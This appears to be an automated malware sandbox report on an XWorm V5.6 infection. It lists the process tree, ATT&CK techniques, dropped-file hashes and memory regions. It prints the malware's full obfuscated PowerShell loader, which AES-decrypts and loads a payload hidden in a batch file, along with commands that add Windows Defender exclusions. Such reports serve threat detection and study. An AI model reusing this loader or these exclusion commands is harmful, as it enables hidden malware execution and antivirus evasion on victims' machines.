- Suspicious use of WriteProcessMemory
PID:3340

C:\Users\Admin\AppData\Roaming\startup_str_600.bat.exe
"startup_str_600.bat.exe" -noprofile -windowstyle hidden -ep bypass -command $_CASH_CnGzR = [System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Roaming\startup_str_600.bat').Split([Environment]::NewLine);foreach ($_CASH_qdZmU in $_CASH_CnGzR) { if ($_CASH_qdZmU.StartsWith(':: @')) { $_CASH_ZoWEj = $_CASH_qdZmU.Substring(4); break; }; };$_CASH_ZoWEj = [System.Text.RegularExpressions.Regex]::Replace($_CASH_ZoWEj, '_CASH_', '');$_CASH_fXadG = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($_CASH_ZoWEj);$_CASH_HMtAt = New-Object System.Security.Cryptography.AesManaged;$_CASH_HMtAt.Mode = [System.Security.Cryptography.CipherMode]::CBC;$_CASH_HMtAt.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$_CASH_HMtAt.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('fIynBYcBUpBBez+nt2djmwJqlIyvat7HzgVRpfM2ODQ=');$_CASH_HMtAt.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('+5/SuT9a8EJc5rjsiLxvRg==');$_CASH_tRKDk = $_CASH_HMtAt.CreateDecryptor();$_CASH_fXadG = $_CASH_tRKDk.TransformFinalBlock($_CASH_fXadG, 0, $_CASH_fXadG.Length);$_CASH_tRKDk.Dispose();$_CASH_HMtAt.Dispose();$_CASH_xnUdL = New-Object System.IO.MemoryStream(, $_CASH_fXadG);$_CASH_gkSYz = New-Object System.IO.MemoryStream;$_CASH_UMTAN = New-Object System.IO.Compression.GZipStream($_CASH_xnUdL, [IO.Compression.CompressionMode]::Decompress);$_CASH_UMTAN.CopyTo($_CASH_gkSYz);$_CASH_UMTAN.Dispose();$_CASH_xnUdL.Dispose();$_CASH_gkSYz.Dispose();$_CASH_fXadG = $_CASH_gkSYz.ToArray();$_CASH_lwuuH = [System.Reflection.Assembly]::('daoL'[-1..-4] -join '')($_CASH_fXadG);$_CASH_pYHCE = $_CASH_lwuuH.EntryPoint;$_CASH_pYHCE.Invoke($null, (, [string[]] ('')))
6⤵
- Checks computer location settings
- Executes dropped EXE
- Adds Run key to start application
- Suspicious behavior: AddClipboardFormatListener
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3712

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\Admin\AppData\Roaming\startup_str_600')
7⤵
- Suspicious behavior: EnumeratesProcesses
PID:1896

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\startup_str_600.bat'
7⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:1584

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'startup_str_600.bat.exe'
7⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:3152

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\svchost.exe'
7⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:1620

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svchost.exe'
7⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:4588

C:\Users\Admin\AppData\Roaming\Xworm V5.6.exe
"C:\Users\Admin\AppData\Roaming\Xworm V5.6.exe"
2⤵
- Executes dropped EXE
PID:64

C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /4
1⤵
- Checks SCSI registry key(s)
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:2000

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
968cb9309758126772781b83adb8a28f

SHA1
8da30e71accf186b2ba11da1797cf67f8f78b47c

SHA256
92099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a

SHA512
4bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Filesize
53KB

MD5
06ad34f9739c5159b4d92d702545bd49

SHA1
9152a0d4f153f3f40f7e606be75f81b582ee0c17

SHA256
474813b625f00710f29fa3b488235a6a22201851efb336bddf60d7d24a66bfba

SHA512
c272cd28ae164d465b779163ba9eca6a28261376414c6bbdfbd9f2128adb7f7ff1420e536b4d6000d0301ded2ec9036bc5c657588458bff41f176bdce8d74f92

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Filesize
53KB

MD5
0b7df220ea6d6199a01fe10553f4d2f4

SHA1
b139f1dc3caf61f16d3d01827705640293472412

SHA256
5c816244576ce342174cdd31aa08bfcb19f14e4d170089812ab385a9fbee0cd9

SHA512
79ebeb0a3a77acea6d0904269673b7485d4895077c513cbda70f0b5afba5e19194549f8cc1ed920e33383b0ac81b85b7caa662cff50b2aa74babf1f6b659f4ef

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
18KB

MD5
d936df4919e2ed5690eaad62a47466c9

SHA1
cace299b0ce1ab7b922be2459c99f38bea0aee16

SHA256
94a568a138c28b420fb62acd7b85e47ad69974e8f9948342690742f5a5d9beae

SHA512
68f3ef1d4e080422073c462be6756ac4e0231987e656d54141c59bb848b787100311150072b28b238d681bda7112c0bdff7f7a4c6a9177fca3b78983e2a0407f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
20KB

MD5
a0e62e10e67bcba2df7b69d534763cb0

SHA1
d408630358510a568d48596b6004f6b3f0e90e28

SHA256
d348e0a5ef3cc1bfb5ab46dfdd58873720413019f26287317a90ee9975166e04

SHA512
a90d5009cf67409b1bef96c2be0a713faeed37dd899ffc39ea695df9bb1445251589e75a06810a1bb1fc068e2bb06737912a3e013e20849d70a36ae64cdea0b3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
21KB

MD5
4bd6c9d40bfa0959d0a081264e4d96cb

SHA1
74df855a08e5e6a94587aba8c386120cdae2bb15

SHA256
17e5d08e557ac2818f87a1a93a45d244777697cf06a957e4f5c62569e189ed45

SHA512
864aa7f0e6a7a7e88a1a59bfc551a680f3e844a6ab8da77dad8c48a73f6e7a9f7641332e6c9d9475377cc3a575bc92b427d4983e0a968586384246bb64ab73e3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
17KB

MD5
932c8a76787ba253a62381e1db62d244

SHA1
375644586543b329f314d53267c3f9fbb1982d6a

SHA256
914602308d157ddec45d94e75d8dcd32d7e35aee3b1b8f4f7ddad00182d78f14

SHA512
acc2fcdac9bbeeebfcad001498e0d215cb75f0c29d2a7ef073c904f5b40dbcfef637980069447321b54f3c10a017d390ae89bd555941f2f52e19b39434cebbbe

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
20KB

MD5
e5c87b280cf547eaea9d5b81e5d14833

SHA1
1db5cd38eb9803e4be93513226ef2b9120562d9f

SHA256
2a5e04b7c0d148c65bddc7dad854f655f3bdee2b3cc688656b6b4b781a3807c2

SHA512
a736dfa676c67a1ed60f245c7bdeab640ca324c47b4dc4b341ee5be4ddda8af9a468071d5a759af990c24601e344817e7c0b46f39b5e8c2795d0fc7802c8d2e4

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
18KB

MD5
5ddef6418cbdace68db0c4849c0f43eb

SHA1
173a56451b3ad62c7a1755726170ba7ed988dbe7

SHA256
c3490a9847b88fd114c5f608d0b5c7ab7467282259500fc23145debdf7516667

SHA512
10efcd9dd57eacb993fbff86d11db620612311c80c782ae5f7925477570f6dedb34719814245251f625ec3cf787c04c2af83569dfb53315998e53deb1263b880

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
18KB

MD5
1461f8e8006b0d326e611ecf478311c3

SHA1
82a4aab28d434b7918ccdafa6644cedb31b1702b

SHA256
cf5b252bf410daa5ef44bae8126c4cd902bd252d837f133ee1f3eceb833ccc00

SHA512
3c0cd123ca5e25cfc498de0eed59b0da5c97a9e79fb3c4b9fe5924896949f2d916dbcc29d05058ade11af783f1c041554bc970b51465f18a032c4f357a6ff662

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
18KB

MD5
141c56fb3a8b24f58c50a49d4c419d18

SHA1
d59b2eb4d6500fa48a78ae14e72a7a51eebd80be

SHA256
39094c92a0a59ffc9f1b4cbdcf88eca0fda7bdbcd2f0b55a9a79e945a5b7f945

SHA512
8e1992d3aa5d28f02638929e0bd13b7859598660b83b6d63be45e14ebcc9146e88a0c6b8799db37cc99b7879f04d9fc40cd9580f313ae319e190dd209e028859

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_3o3lie1t.fr3.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\Xworm V5.6.exe

Filesize
14.9MB

MD5
56ccb739926a725e78a7acf9af52c4bb

SHA1
5b01b90137871c3c8f0d04f510c4d56b23932cbc

SHA256
90f58865f265722ab007abb25074b3fc4916e927402552c6be17ef9afac96405

SHA512
2fee662bc4a1a36ce7328b23f991fa4a383b628839e403d6eb6a9533084b17699a6c939509867a86e803aafef2f9def98fa9305b576dad754aa7f599920c19a1

Download Submit
C:\Users\Admin\AppData\Roaming\startup_str_437.vbs

Filesize
115B

MD5
09919973d508ae267f50da4160423b70

SHA1
2f2460857af59b00eb0ea64d771d641c14108e40

SHA256
6b7207442599a1c691b5e36f7785078ef9c09aa802734e045ad880eca692afa8

SHA512
474f9bf4d2eb41da8916fda79092d246f861fd9683d1b1fe11b2014aa5f73da0cffa6e06f493c5e1e4d48bfeff16a5949ebd0a399dad9c88075ab3184275daa8

Download Submit
C:\Users\Admin\AppData\Roaming\startup_str_600.vbs

Filesize
115B

MD5
8d99f4924ef95453687c157e804c9b60

SHA1
5c1033f40b2ff5b82bcd7f3b7327aca73f8c05fb

SHA256
9c06a5186719d628bd78ca5bf2adb5adf6687f45080be5a453b2466eb0eba7f5

SHA512
7e22fa19c08be6f6233d10b338416da20c9f39b8037799930b272b27346a7f58573e55b0bc5b70211c1de4d076128ea97af36e86b6d81f825b71957c9c655a50

Download Submit
C:\Users\Admin\AppData\Roaming\xfixer.bat

Filesize
304KB

MD5
28a668375e0d2b1cfa1d847fc44934d4

SHA1
bd0d7df2f07f879e97e02d13d9eebf0a584fabe7

SHA256
cc3de81425f13eba2412c152f843351307b3d7f3cb9bd2da3d577ec5e36f8160

SHA512
d35dd9fd930f84f5cf1b042c828b6d2adc3007ff0042153f5f7fd45f8539f4155df8b07f59fe488ab3a03f2af4f8067b56c7276b3c80d3554d02ed930470689c

Download Submit
C:\Users\Admin\AppData\Roaming\xworm.bat

Filesize
317KB

MD5
ada0b01d33911547bb0086e0ed152484

SHA1
ec81374c631f94c536b51dfb8c42c063bf72ca78

SHA256
aba89066a3bbc1addaaa48b4d209dac1e59138afb64c797bf950d286e8e826a1

SHA512
6aba80c863169fe3a244e20c6d9cfc13f8f69ff81a8402327603f46700a2798d19d1347f0c34e9301cac9aeec0ae5ae9adc76f571dddb9fdbfac6c23de3aae26

Download Submit
C:\Users\Admin\AppData\Roaming\xworm.bat.exe

Filesize
423KB

MD5
c32ca4acfcc635ec1ea6ed8a34df5fac

SHA1
f5ee89bb1e4a0b1c3c7f1e8d05d0677f2b2b5919

SHA256
73a3c4aef5de385875339fc2eb7e58a9e8a47b6161bdc6436bf78a763537be70

SHA512
6e43dca1b92faace0c910cbf9308cf082a38dd39da32375fad72d6517dea93e944b5e5464cf3c69a61eabf47b2a3e5aa014d6f24efa1a379d4c81c32fa39ddbc

Download Submit
memory/64-38-0x000001533DC50000-0x000001533EB38000-memory.dmp

Filesize
14.9MB

Download
memory/1284-86-0x0000000006E10000-0x0000000007064000-memory.dmp

Filesize
2.3MB

Download
memory/1584-299-0x00000000075F0000-0x0000000007604000-memory.dmp

Filesize
80KB

Download
memory/1584-287-0x0000000074000000-0x000000007404C000-memory.dmp

Filesize
304KB

Download
memory/1584-297-0x0000000007230000-0x00000000072D3000-memory.dmp

Filesize
652KB

Download
memory/1584-298-0x0000000007450000-0x0000000007461000-memory.dmp

Filesize
68KB

Download
memory/1620-332-0x0000000074000000-0x000000007404C000-memory.dmp

Filesize
304KB

Download
memory/1856-88-0x0000000006DE0000-0x0000000007032000-memory.dmp

Filesize
2.3MB

Download
memory/1896-247-0x0000000074000000-0x000000007404C000-memory.dmp

Filesize
304KB

Download
memory/2000-398-0x0000015DB0790000-0x0000015DB0791000-memory.dmp

Filesize
4KB

Download
memory/2000-392-0x0000015DB0790000-0x0000015DB0791000-memory.dmp

Filesize
4KB

Download
memory/2000-403-0x0000015DB0790000-0x0000015DB0791000-memory.dmp

Filesize
4KB

Download
memory/2000-404-0x0000015DB0790000-0x0000015DB0791000-memory.dmp

Filesize
4KB

Download
memory/2000-393-0x0000015DB0790000-0x0000015DB0791000-memory.dmp

Filesize
4KB

Download
memory/2000-394-0x0000015DB0790000-0x0000015DB0791000-memory.dmp

Filesize
4KB

Download
memory/2000-399-0x0000015DB0790000-0x0000015DB0791000-memory.dmp

Filesize
4KB

Download
memory/2000-402-0x0000015DB0790000-0x0000015DB0791000-memory.dmp

Filesize
4KB

Download
memory/2000-401-0x0000015DB0790000-0x0000015DB0791000-memory.dmp

Filesize
4KB

Download
memory/2000-400-0x0000015DB0790000-0x0000015DB0791000-memory.dmp

Filesize
4KB

Download
memory/2216-274-0x00000000070B0000-0x00000000070C2000-memory.dmp

Filesize
72KB

Download
memory/2216-272-0x00000000048A0000-0x00000000048BE000-memory.dmp

Filesize
120KB

Download
memory/2216-275-0x0000000007110000-0x000000000714C000-memory.dmp

Filesize
240KB

Download
memory/2216-273-0x00000000080E0000-0x00000000086F8000-memory.dmp

Filesize
6.1MB

Download
memory/2216-276-0x0000000007270000-0x000000000737A000-memory.dmp

Filesize
1.0MB

Download
memory/3152-311-0x0000000074000000-0x000000007404C000-memory.dmp

Filesize
304KB

Download
memory/3500-170-0x0000000074000000-0x000000007404C000-memory.dmp

Filesize
304KB

Download
memory/3500-180-0x00000000073A0000-0x00000000073B1000-memory.dmp

Filesize
68KB

Download
memory/3712-367-0x0000000008300000-0x000000000830A000-memory.dmp

Filesize
40KB

Download
memory/3712-389-0x000000000D440000-0x000000000D454000-memory.dmp

Filesize
80KB

Download
memory/3712-388-0x000000000D420000-0x000000000D431000-memory.dmp

Filesize
68KB

Download
memory/3712-269-0x0000000007640000-0x00000000076DC000-memory.dmp

Filesize
624KB

Download
memory/3712-268-0x0000000004E00000-0x0000000004E16000-memory.dmp

Filesize
88KB

Download
memory/3712-387-0x000000000D2C0000-0x000000000D363000-memory.dmp

Filesize
652KB

Download
memory/3712-377-0x000000006FDA0000-0x00000000700F4000-memory.dmp

Filesize
3.3MB

Download
memory/3712-376-0x0000000074000000-0x000000007404C000-memory.dmp

Filesize
304KB

Download
memory/3712-375-0x000000000C590000-0x000000000C5DA000-memory.dmp

Filesize
296KB

Download
memory/3712-374-0x000000000C100000-0x000000000C122000-memory.dmp

Filesize
136KB

Download
memory/3712-373-0x000000000C0A0000-0x000000000C0AE000-memory.dmp

Filesize
56KB

Download
memory/3712-372-0x000000000A9B0000-0x000000000AACE000-memory.dmp

Filesize
1.1MB

Download
memory/3712-371-0x000000000A5B0000-0x000000000A900000-memory.dmp

Filesize
3.3MB

Download
memory/3712-366-0x0000000008330000-0x00000000083C2000-memory.dmp

Filesize
584KB

Download
memory/3712-365-0x0000000008700000-0x0000000008CA4000-memory.dmp

Filesize
5.6MB

Download
memory/4532-257-0x0000000074000000-0x000000007404C000-memory.dmp

Filesize
304KB

Download
memory/4588-353-0x0000000074000000-0x000000007404C000-memory.dmp

Filesize
304KB

Download
memory/4860-169-0x0000000006F90000-0x0000000007033000-memory.dmp

Filesize
652KB

Download
memory/4860-159-0x0000000074000000-0x000000007404C000-memory.dmp

Filesize
304KB

Download
memory/4968-125-0x0000000074000000-0x000000007404C000-memory.dmp

Filesize
304KB

Download
memory/5004-115-0x0000000074000000-0x000000007404C000-memory.dmp

Filesize
304KB

Download
memory/5048-95-0x00000000731B0000-0x0000000073960000-memory.dmp

Filesize
7.7MB

Download
memory/5048-80-0x0000000007A20000-0x0000000007A3A000-memory.dmp

Filesize
104KB

Download
memory/5048-83-0x0000000007C20000-0x0000000007C31000-memory.dmp

Filesize
68KB

Download
memory/5048-74-0x00000000076D0000-0x0000000007773000-memory.dmp

Filesize
652KB

Download
memory/5048-84-0x0000000007C60000-0x0000000007C6E000-memory.dmp

Filesize
56KB

Download
memory/5048-89-0x0000000007D60000-0x0000000007D7A000-memory.dmp

Filesize
104KB

Download
memory/5048-91-0x0000000007D40000-0x0000000007D48000-memory.dmp

Filesize
32KB

Download
memory/5048-85-0x0000000007C70000-0x0000000007C84000-memory.dmp

Filesize
80KB

Download
memory/5048-81-0x0000000007AA0000-0x0000000007AAA000-memory.dmp

Filesize
40KB

Download
memory/5048-82-0x0000000007CA0000-0x0000000007D36000-memory.dmp

Filesize
600KB

Download
memory/5048-68-0x0000000007660000-0x000000000767E000-memory.dmp

Filesize
120KB

Download
memory/5048-58-0x0000000074000000-0x000000007404C000-memory.dmp

Filesize
304KB

Download
memory/5048-79-0x0000000008060000-0x00000000086DA000-memory.dmp

Filesize
6.5MB

Download
memory/5048-6-0x00000000731BE000-0x00000000731BF000-memory.dmp

Filesize
4KB

Download
memory/5048-57-0x0000000007680000-0x00000000076B2000-memory.dmp

Filesize
200KB

Download
memory/5048-39-0x00000000067B0000-0x00000000067FC000-memory.dmp

Filesize
304KB

Download
memory/5048-37-0x0000000006700000-0x000000000671E000-memory.dmp

Filesize
120KB

Download
memory/5048-22-0x0000000006000000-0x0000000006066000-memory.dmp

Filesize
408KB

Download
memory/5048-32-0x00000000060E0000-0x0000000006434000-memory.dmp

Filesize
3.3MB

Download
memory/5048-23-0x0000000006070000-0x00000000060D6000-memory.dmp

Filesize
408KB

Download
memory/5048-21-0x0000000005F60000-0x0000000005F82000-memory.dmp

Filesize
136KB

Download
memory/5048-18-0x00000000731B0000-0x0000000073960000-memory.dmp

Filesize
7.7MB

Download
memory/5048-11-0x00000000731B0000-0x0000000073960000-memory.dmp

Filesize
7.7MB

Download
memory/5048-12-0x00000000057C0000-0x0000000005DE8000-memory.dmp

Filesize
6.2MB

Download
memory/5048-7-0x0000000005150000-0x0000000005186000-memory.dmp

Filesize
216KB

Download